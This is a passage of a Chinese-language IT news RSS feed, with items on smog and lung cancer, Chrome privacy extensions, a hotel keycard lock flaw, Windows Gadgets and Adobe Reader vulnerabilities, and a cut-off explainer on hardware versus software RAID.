&lt;a href="http://feeds.feedburner.com/~ff/solidot?a=Vb1DG5VLdWU:FbplbcOV7G0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA" border="0"&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=Vb1DG5VLdWU:FbplbcOV7G0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA" border="0"&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/34818-%E5%A4%A9%E6%B6%AF-%E5%8D%83%E4%B8%87-%E7%94%A8%E6%88%B7</guid>
      <pubDate>Mon, 26 Dec 2011 08:45:00 CST</pubDate>
    </item>
    <item>
      <title>严重灰霾污染7年后为肺癌高发期</title>
      <link>https://itindex.net/detail/34213-%E4%B8%A5%E9%87%8D-%E7%81%B0%E9%9C%BE-%E6%B1%A1%E6%9F%93</link>
      <description>你是传奇 写道 "广州气象专家吴兑研究发现，出现灰霾严重的年份后，相隔七年就会出现肺癌高发期。空气中的PM2.5吸入人体后，会进入血液和肺泡，对呼吸系统和心血管系统造成伤害。吴兑说，肺癌死亡率从上60年代至今上升了许多，但同时和肺癌密切相关的吸烟率却在下降，“灰霾将取代吸烟，成为肺癌致病头号杀手”。11月的一次国际气象会议上，环保部副部长张力军承认：如果增加PM2.5监测指数，全国70%城市空气质量不达标。不过来自北京市的观点并不一致：针对肺癌6年来高居北京群癌之首，北京市卫生局副局长毛羽认为吸烟是首要诱因。 去年广州市职业病防治院副院长刘移民建议空气污染严重时，出门应佩戴R95口罩。"&lt;img width="1" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/1a6be0cd/mf.gif" border="0"&gt;&lt;div&gt;&lt;table border="0"&gt;&lt;tr&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/sendemail2.html?title=%E4%B8%A5%E9%87%8D%E7%81%B0%E9%9C%BE%E6%B1%A1%E6%9F%937%E5%B9%B4%E5%90%8E%E4%B8%BA%E8%82%BA%E7%99%8C%E9%AB%98%E5%8F%91%E6%9C%9F&amp;amp;link=http%3A%2F%2Fscience.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F26%2F1242223%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/emailthis2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E4%B8%A5%E9%87%8D%E7%81%B0%E9%9C%BE%E6%B1%A1%E6%9F%937%E5%B9%B4%E5%90%8E%E4%B8%BA%E8%82%BA%E7%99%8C%E9%AB%98%E5%8F%91%E6%9C%9F&amp;amp;link=http%3A%2F%2Fscience.solidot.org%2Farticle.pl%3Fsid%3D11%2F11%2F26%2F1242223%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/bookmark.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://da.feedsportal.com/r/118102608297/u/49/f/556826/c/33236/s/1a6be0cd/a2.htm"&gt;&lt;img src="http://da.feedsportal.com/r/118102608297/u/49/f/556826/c/33236/s/1a6be0cd/a2.img" border="0"&gt;&lt;/a&gt;&lt;div&gt;
&lt;a href="http://feeds.feedburner.com/~ff/solidot?a=QMjbWFJGpuk:N6zLGul114w:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA" border="0"&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=QMjbWFJGpuk:N6zLGul114w:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA" border="0"&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/34213-%E4%B8%A5%E9%87%8D-%E7%81%B0%E9%9C%BE-%E6%B1%A1%E6%9F%93</guid>
      <pubDate>Sat, 26 Nov 2011 20:40:00 CST</pubDate>
    </item>
    <item>
      <title>八款优秀的 Chrome 安全及隐私扩展让你过个太平春节</title>
      <link>https://itindex.net/detail/35017-chrome-%E5%AE%89%E5%85%A8-%E9%9A%90%E7%A7%81</link>
      <description>&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/Google-Chrome-Privacy.png" alt="" width="408" height="266"&gt;&lt;/p&gt;
&lt;p&gt;年关将至，各位除了出门在外要小心保管好身上财物，对于浏览器安全也不可忽视，尤其近期天朝互联网风卷残云，剩下一片狼藉。为了过一个太平的春节，各位可以把 Chrome 通过各种扩展武装起来，为自己的安全保驾护航。Chrome 生态圈活跃度可谓强势，Firefox 的扩展数量和质量的优势已经被慢慢蚕食，makeuseof 网站为我们精选了 8 款优秀的 Chrome 安全及隐私扩展，废话少说，让我们来一探究竟吧。（点击扩展标题可直接进入扩展下载页）&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/odjhifogjcknibkahlpidmdajjpkkcfn"&gt;NotScripts&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;NotScripts 能阻止网页上的 JavaScript 运行。如果你信任某个网站，也可将其加入白名单。使用此扩展能有效预防 JavaScript 的代码攻击，但是如果禁用 JavaScript ，大多数网站都无法正常浏览。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/notscripts2-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;p&gt;但是出于 Chrome 对扩展的一些限定，NotScripts 也有一些&lt;a href="http://optimalcycling.com/other-projects/notscripts/limitations/"&gt;限制&lt;/a&gt;，但他的功能已经很接近于 Firefox 上的 NoScript。其中一个限制是使用前你必须要在一个文本文件中为白名单设置一个密码，以防止其他网站恶意窥探你的白名单。其次，行内脚本 （Inline Scripts）是无法被阻止的。&lt;/p&gt;
&lt;p&gt;NotScripts 也可以阻止&lt;del&gt;万恶之源&lt;/del&gt; flash 的运行。如果你想单单屏蔽 flash，可以尝试 &lt;a href="https://chrome.google.com/webstore/detail/gofhjkjmkpinhpoiabjplobcaignabnl"&gt;FlashBlock&lt;/a&gt;。&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/cfhdojbkjhnklbpkdaibdccddilifddb"&gt;Adblock Plus&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;大名鼎鼎的 Adblock Plus 是不会错过的，除了屏蔽广告，该扩展也已经默认屏蔽跟踪脚本。这个相比 NotScripts 更有针对性，但是缺点是只能预防已知攻击威胁。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/abp-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/mlomiejdfkolichcflejclcbmpeaniij"&gt;Ghostery&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;Ghostery 不仅仅是个屏蔽跟踪脚本的扩展，他还能提供各种信息。只要你浏览的网内有广告网络或者跟踪脚本，Ghostery 就会弹窗并提供相关信息，内容有广告信息，链接，隐私政策和 opt-out 页面。 Ghostery 的特别之处是他以对用户友好的方式提供了网站背后的信息。（其实除了 nerd 和 geek 们，不太会有人去看那些繁琐的信息吧。。）&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/ghostery1-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;p&gt;Ghostery 也可以自定义设置屏蔽哪些广告网络。一个或者全部，都由用户自己做主。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/ghostery2-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/flcpelgcagfhfoegekianiofphddckof"&gt;KB SSL Enforcer&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;KB SSL Enforcer 与 Firefox 上的 Electronic Frontier Foundation’s HTTPS Everywhere 非常相似。很多网站提供 https 但没有默认强制用户转向到 https 页。该扩展内置了支持 https 网站的列表，一旦你访问这类网站，他变会自动将页面转向到更安全的 https。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/kb-ssl-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/bhmmomiinigofkjcapegjjndpbikblnp"&gt;WOT&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;Web of Trust，简称 WOT，为众多网站提供了由用户提交的信任评分。在输入你的个人信息前，你可以通过该扩展看看其他用户对他的评分如何，如果评分略低，你在提供隐私信息前可以先掂量一下了。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/Screen-Shot-2012-01-04-at-6.42.24-PM.png" alt="" width="519" height="367"&gt;&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/gieohaicffldbmiilohhggbidhephnjj"&gt;Vanilla Cookie Manager&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;该扩展和 NotScripts 路数一致，默认屏蔽所有的 cookie。一样也拥有白名单功能。Cookie 不但能跟踪你是否在线，也能保存你的个人喜好和登陆信息，很多网站需要依靠 cookie 来正常运行。对此敏感的用户可以用该扩展达到宁可错杀一千不可漏过一个的境界。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/vanilla-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/lgpkjjingioekjianemgdobchenebhek"&gt;SaferChrome&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;当网站尝试以明文来传输你的密码或者信用卡账号时，SaferChrome 会试图警告你。一个“正常”的网站当然都会以密文来传输用户的敏感信息。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/saferchrome-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;p&gt;该扩展也会在用户浏览 Twitter 和 Facebook 的时候强制转向到其 https 站。不过术业有专攻，KB SSL Enforcer 显然在这个用途上是个更合适的选择。&lt;/p&gt;
&lt;p&gt;墙裂推荐天朝用户安装该扩展。&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1&gt;&lt;a href="https://chrome.google.com/webstore/detail/caehdcpeofiiigpdhbabniblemipncjj"&gt;Proxy Switchy!&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;最后一个介绍的天朝用户的熟面孔。Proxy Switchy! 能帮助用户快速的切换各种代理。在浏览某些特定网站时该扩展还能自动启用特定代理。我朝用户搭梯子首选。&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.guao.hk/wp-content/uploads/2012/01/proxy-550x472.png" alt="" width="550" height="472"&gt;&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;小提示：&lt;/p&gt;
&lt;p&gt;用户可以结合自己的实际情况，通过不同的扩展搭配，来达到最适合自己的安全效果。&lt;/p&gt;
&lt;p&gt;别忘了 Chrome 的匿名浏览方式。扩展只能帮助远端窃取你的信息。想要在本地上不留蛛丝马迹，还需匿名浏览方式配合。&lt;/p&gt;
&lt;p&gt;加强自我的密码管理，这方面最近文章已经很多了，看官们可以搜索一下。&lt;/p&gt;
&lt;p&gt;祝各位读者过个安全愉快的春节 ^ ^&lt;/p&gt;
&lt;p&gt;Via &lt;a href="http://www.makeuseof.com/tag/top-8-security-privacy-extensions-chrome-browser/"&gt;makeuseof&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Pic via &lt;a href="http://www.geekyard.com/wp-content/uploads/2011/04/Google-Chrome-Privacy.png"&gt;geekyard&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;small&gt;© Yimin 发表于 &lt;a href="http://www.guao.hk"&gt;谷奥——探寻谷歌的奥秘 ( http://www.guao.hk )&lt;/a&gt;, 2012.  |
&lt;a href="http://www.guao.hk/posts/8-security-privacy-extensions-chrome.html#comments"&gt;6 条评论&lt;/a&gt; |
&lt;a href="http://www.guao.hk/posts/8-security-privacy-extensions-chrome.html"&gt;永久链接&lt;/a&gt; |
&lt;a href="http://google.org.cn/about/"&gt;关于谷奥&lt;/a&gt; |
&lt;a href="http://google.org.cn/submit/"&gt;投稿/爆料&lt;/a&gt;&lt;br&gt;
Post tags: &lt;a href="http://www.guao.hk/tag/chrome-extension" rel="tag"&gt;Chrome Extension&lt;/a&gt;, &lt;a href="http://www.guao.hk/tag/google-chrome" rel="tag"&gt;Google Chrome&lt;/a&gt;, &lt;a href="http://www.guao.hk/tag/privacy" rel="tag"&gt;privacy&lt;/a&gt;, &lt;a href="http://www.guao.hk/tag/security" rel="tag"&gt;Security&lt;/a&gt;
&lt;/small&gt;&lt;/p&gt;
&lt;img src="http://img.tongji.linezing.com/1105192/tongji.php" border="0" width="0" height="0"&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Google技巧 Chrome Extension Google Chrome privacy Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/35017-chrome-%E5%AE%89%E5%85%A8-%E9%9A%90%E7%A7%81</guid>
      <pubDate>Thu, 05 Jan 2012 08:02:47 CST</pubDate>
    </item>
    <item>
      <title>黑客能用开源硬件打开百万旅馆房间门</title>
      <link>https://itindex.net/detail/38876-%E9%BB%91%E5%AE%A2-%E5%BC%80%E6%BA%90%E7%A1%AC%E4%BB%B6-%E7%99%BE%E4%B8%87</link>
      <description>利用开源硬件Arduino控制器，再加上少许编程能力，Mozilla软件工程师Cody Brocious在拉斯维加斯举行的Black Hat安全会议上称，黑客能够迅速打开钥匙卡保护的旅馆房间门。400万使用Onity公司的可编程钥匙卡的旅馆房间面临入侵风险。修正漏洞并非易事，因为钥匙卡没有固件可升级。如果旅馆想保护用户，他们必须更换钥匙卡。Brocious发现，Arduino控制器能读取卡上储存的32位密钥，不需要认证。 &lt;img border="0" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/21b98190/mf.gif" width="1"&gt;&lt;/img&gt; &lt;div&gt;  &lt;table border="0"&gt;   &lt;tr&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://share.feedsportal.com/viral/sendEmail.cfm?lang=en&amp;title=%E9%BB%91%E5%AE%A2%E8%83%BD%E7%94%A8%E5%BC%80%E6%BA%90%E7%A1%AC%E4%BB%B6%E6%89%93%E5%BC%80%E7%99%BE%E4%B8%87%E6%97%85%E9%A6%86%E6%88%BF%E9%97%B4%E9%97%A8&amp;link=http%3A%2F%2Fhardware.solidot.org%2Farticle.pl%3Fsid%3D12%2F07%2F26%2F0646239%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/emailthis2.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E9%BB%91%E5%AE%A2%E8%83%BD%E7%94%A8%E5%BC%80%E6%BA%90%E7%A1%AC%E4%BB%B6%E6%89%93%E5%BC%80%E7%99%BE%E4%B8%87%E6%97%85%E9%A6%86%E6%88%BF%E9%97%B4%E9%97%A8&amp;link=http%3A%2F%2Fhardware.solidot.org%2Farticle.pl%3Fsid%3D12%2F07%2F26%2F0646239%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/bookmark.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt; &lt;br /&gt; &lt;br /&gt; &lt;a href="http://da.feedsportal.com/r/139262495268/u/49/f/556826/c/33236/s/21b98190/a2.htm"&gt;  &lt;img border="0" src="http://da.feedsportal.com/r/139262495268/u/49/f/556826/c/33236/s/21b98190/a2.img"&gt;&lt;/img&gt;&lt;/a&gt; &lt;img border="0" height="1" src="http://pi.feedsportal.com/r/139262495268/u/49/f/556826/c/33236/s/21b98190/a2t.img" width="1"&gt;&lt;/img&gt; &lt;div&gt;
  &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=wASZc3f15Tc:SyPBYQF0eAM:yIl2AUoC8zA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA"&gt;&lt;/img&gt;&lt;/a&gt;   &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=wASZc3f15Tc:SyPBYQF0eAM:7Q72WNTAKBA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/38876-%E9%BB%91%E5%AE%A2-%E5%BC%80%E6%BA%90%E7%A1%AC%E4%BB%B6-%E7%99%BE%E4%B8%87</guid>
      <pubDate>Thu, 26 Jul 2012 14:45:00 CST</pubDate>
    </item>
    <item>
      <title>因安全漏洞，微软建议用户禁用 Windows Gadgets</title>
      <link>https://itindex.net/detail/38657-%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E-%E5%BE%AE%E8%BD%AF-%E7%94%A8%E6%88%B7</link>
      <description>&lt;p&gt;  &lt;img alt="&amp;#22240;&amp;#23433;&amp;#20840;&amp;#28431;&amp;#27934;&amp;#65292;&amp;#24494;&amp;#36719;&amp;#24314;&amp;#35758;&amp;#29992;&amp;#25143;&amp;#31105;&amp;#29992; Windows Gadgets" height="411" src="http://livesino.net/images/farm21/-Windows-Gadgets_69E2/windows_8_gadgets.jpg" title="&amp;#22240;&amp;#23433;&amp;#20840;&amp;#28431;&amp;#27934;&amp;#65292;&amp;#24494;&amp;#36719;&amp;#24314;&amp;#35758;&amp;#29992;&amp;#25143;&amp;#31105;&amp;#29992; Windows Gadgets" width="640"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;本周初微软发布了一则  &lt;a href="http://technet.microsoft.com/en-us/security/advisory/2719662" target="_blank"&gt;安全公告&lt;/a&gt;，告知用户可能会因为“不安全”的 Windows Sidebar 和 Gadgets 恶意代码而受到攻击。  &lt;a href="http://www.computerworld.com/s/article/9228997/Microsoft_urges_death_of_Windows_gadgets_as_researchers_plan_disclosures?source=rss_news_analysis&amp;utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+computerworld%2Fs%2Ffeed%2Ftype%2Fnewsanalysis+%28Computerworld+News+Analysis%29"&gt;Computerworld&lt;/a&gt; 称研究员将在本月底的 Black Hat 大会上公开这些安全漏洞。&lt;/p&gt;
 &lt;p&gt;微软暂时给出的解决方案是：禁用 Windows Sidebar 和 Gadgets 小工具功能。该安全问题涉及 Windows Vista 和 Windows 7，微软提供了   &lt;a href="http://go.microsoft.com/?linkid=9813057" target="_blank"&gt;Fix It 自动执行程序&lt;/a&gt;（  &lt;a href="http://support.microsoft.com/kb/2719662" target="_blank"&gt;KB 2719662&lt;/a&gt;）来禁用 Gadgets 功能，下载通过管理员权限运行即可。&lt;/p&gt;
 &lt;p&gt;另外，Tom Warren 的可靠消息源透露，微软已经决定在 Windows 8 正式版中删除 Windows Gadgets 功能，目前还未经微软确认，也不知是否和此安全问题相关。考虑到 Gadgets 的官方发布平台   &lt;a href="http://livesino.net/archives/3723.live" target="_blank" title="Windows Live Gallery &amp;#27491;&amp;#24335;&amp;#20851;&amp;#38381;"&gt;Windows Live Gallery 已经关闭&lt;/a&gt;，微软剔除该功能并不意外。 （via   &lt;a href="http://www.theverge.com/2012/7/11/3151143/windows-gadgets-security-vulnerability" target="_blank" title="Microsoft advises users to disable Windows Gadgets following security vulnerability fears"&gt;The Verge&lt;/a&gt;）&lt;/p&gt;
 &lt;p&gt;©2011   &lt;a href="http://livesino.net"&gt;LiveSino.net&lt;/a&gt; |   &lt;a href="http://livesino.net/archives/4264.live" title="&amp;#22240;&amp;#23433;&amp;#20840;&amp;#28431;&amp;#27934;&amp;#65292;&amp;#24494;&amp;#36719;&amp;#24314;&amp;#35758;&amp;#29992;&amp;#25143;&amp;#31105;&amp;#29992; Windows Gadgets"&gt;阅读原文&lt;/a&gt; |   &lt;a href="http://livesino.net/archives/4264.live#comments" title="&amp;#22240;&amp;#23433;&amp;#20840;&amp;#28431;&amp;#27934;&amp;#65292;&amp;#24494;&amp;#36719;&amp;#24314;&amp;#35758;&amp;#29992;&amp;#25143;&amp;#31105;&amp;#29992; Windows Gadgets &amp;#30340;&amp;#35780;&amp;#35770;"&gt;添加评论&lt;/a&gt;&lt;/p&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>资讯 Gadgets Gallery Security Vista</category>
      <guid isPermaLink="true">https://itindex.net/detail/38657-%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E-%E5%BE%AE%E8%BD%AF-%E7%94%A8%E6%88%B7</guid>
      <pubDate>Thu, 12 Jul 2012 08:07:58 CST</pubDate>
    </item>
    <item>
      <title>Google员工发现Adobe Reader的60个漏洞</title>
      <link>https://itindex.net/detail/39302-google-%E5%91%98%E5%B7%A5-%E5%8F%91%E7%8E%B0</link>
      <description>HOST 写道 &amp;quot;Google员工Mateusz Jurczyk和Gynvael Coldwind在检查Chrome浏览器的PDF引擎时，发现了无数漏洞。他们进一步检查了Adobe Reader，结果发现约60个可以让程序崩溃的漏洞，其中约40个可以被攻击者利用。Adobe得知消息后承诺尽快修补，但本周二发布的最新版程序仍然有16个已知漏洞存在。为了证明这一点，Mateusz和Gynvael将这些漏洞模糊化后并公开。Google雇员告诫用户不要随便使用Adobe Reader打开外界PDF文件。&amp;quot; &lt;img border="0" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/227fccbb/mf.gif" width="1"&gt;&lt;/img&gt; &lt;div&gt;  &lt;table border="0"&gt;   &lt;tr&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://share.feedsportal.com/viral/sendEmail.cfm?lang=en&amp;title=Google%E5%91%98%E5%B7%A5%E5%8F%91%E7%8E%B0Adobe+Reader%E7%9A%8460%E4%B8%AA%E6%BC%8F%E6%B4%9E&amp;link=http%3A%2F%2Fsoftware.solidot.org%2Farticle.pl%3Fsid%3D12%2F08%2F18%2F130231%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/emailthis2.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;    &lt;td valign="middle"&gt;     &lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=Google%E5%91%98%E5%B7%A5%E5%8F%91%E7%8E%B0Adobe+Reader%E7%9A%8460%E4%B8%AA%E6%BC%8F%E6%B4%9E&amp;link=http%3A%2F%2Fsoftware.solidot.org%2Farticle.pl%3Fsid%3D12%2F08%2F18%2F130231%26amp%3Bfrom%3Drss" target="_blank"&gt;      &lt;img border="0" src="http://res3.feedsportal.com/images/bookmark.gif"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt; &lt;br /&gt; &lt;br /&gt; &lt;a href="http://da.feedsportal.com/r/139262993548/u/49/f/556826/c/33236/s/227fccbb/a2.htm"&gt;  &lt;img border="0" src="http://da.feedsportal.com/r/139262993548/u/49/f/556826/c/33236/s/227fccbb/a2.img"&gt;&lt;/img&gt;&lt;/a&gt; &lt;img border="0" height="1" src="http://pi.feedsportal.com/r/139262993548/u/49/f/556826/c/33236/s/227fccbb/a2t.img" width="1"&gt;&lt;/img&gt; &lt;div&gt;
  &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=MUAtD632Al0:f8oXYb10Gp4:yIl2AUoC8zA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA"&gt;&lt;/img&gt;&lt;/a&gt;   &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=MUAtD632Al0:f8oXYb10Gp4:7Q72WNTAKBA"&gt;   &lt;img border="0" src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/39302-google-%E5%91%98%E5%B7%A5-%E5%8F%91%E7%8E%B0</guid>
      <pubDate>Sat, 18 Aug 2012 20:54:00 CST</pubDate>
    </item>
    <item>
      <title>（总结）硬RAID、软RAID的区别详解</title>
      <link>https://itindex.net/detail/38217-raid-raid</link>
      <description>&lt;p&gt;  &lt;strong&gt;PS：今天有童鞋问RAID相关的问题，总结记录一下，本人建议在生产环境中就用硬RAID，别用软RAID，除非特殊需求。一般在生产环境中RAID0、1、5、6、10用得最广泛。web服务器或者应用服务器，可以用RAID0或RAID1，重要的数据库服务器建议用RAID5或RAID10。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;什么是RAID?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;RAID是英文Redundant Array of Independent Disks的缩写，翻译成中文即为独立磁盘冗余阵列，或简称磁盘阵列。简单的说，RAID是一种把多块独立的硬盘（物理硬盘）按不同方式组合起来形成一个硬盘组（逻辑硬盘），从而提供比单个硬盘更高的存储性能和提供数据冗余的技术。组成磁盘阵列的不同方式成为RAID级别（RAID Levels）。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;为什么我们采用RAID?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;那些需要在硬盘上保存大量数据的人(例如 一个普通的管理人员) ，采用 RAID 技术将会很方便。采用 RAID 的主要原因是:&lt;/p&gt;
 &lt;p&gt;· 增强了速度  &lt;br /&gt;
· 扩容了存储能力(以及更多的便利)  &lt;br /&gt;
· 可高效恢复磁盘&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;硬RAID与软RAID的区别：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;硬RAID：通过用硬件来实现RAID功能的就是硬RAID，比如：各种RAID卡，还有主板集成能够做的RAID都是硬RAID。&lt;/p&gt;
 &lt;p&gt;软RAID：通过用操作系统来完成RAID功能的就是软RAID，比如：在Linux操作系统下，用3块硬盘做的RAID5。&lt;/p&gt;
 &lt;p&gt;&lt;/p&gt;
 &lt;p&gt;补充：RAID 也有全软、半软半硬与全硬之分，全软RAID 就是指RAID 的所有功能都是操作系统（OS）与CPU 来完成，没有第三方的控制/处理（业界称其为RAID 协处理器――RAID Co-Processor ）与I/O 芯片。这样，有关RAID 的所有任务的处理都由CPU 来完成，可想而知这是效率最低的一种RAID 。半软半硬RAID 则主要缺乏自己的I/O 处理芯片，所以这方面的工作仍要由CPU 与驱动程序来完成。而且，半软半硬RAID 所采用的RAID 控制/处理芯片的能力一般都比较弱，不能支持高的RAID 等级。全硬的RAID 则全面具备了自己的RAID 控制/处理与I/O 处理芯片，甚至还有阵列缓冲（Array Buffer ），对CPU 的占用率以及整体性能是这三种类型中最优势的，但设备成本也是三种类型中最高的。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;一、性能&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这可能是最重要的一个方面，用RAID就是为了提高性能。从理论上说，使用RAID0可以获得使用单硬盘双倍的速度，用软／硬RAID0都可以接近这个速度。使用软RAID的CPU占用率要高一些，所以在性能上，硬RAID要领先。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;二、稳定性&lt;/strong&gt;&lt;/p&gt;
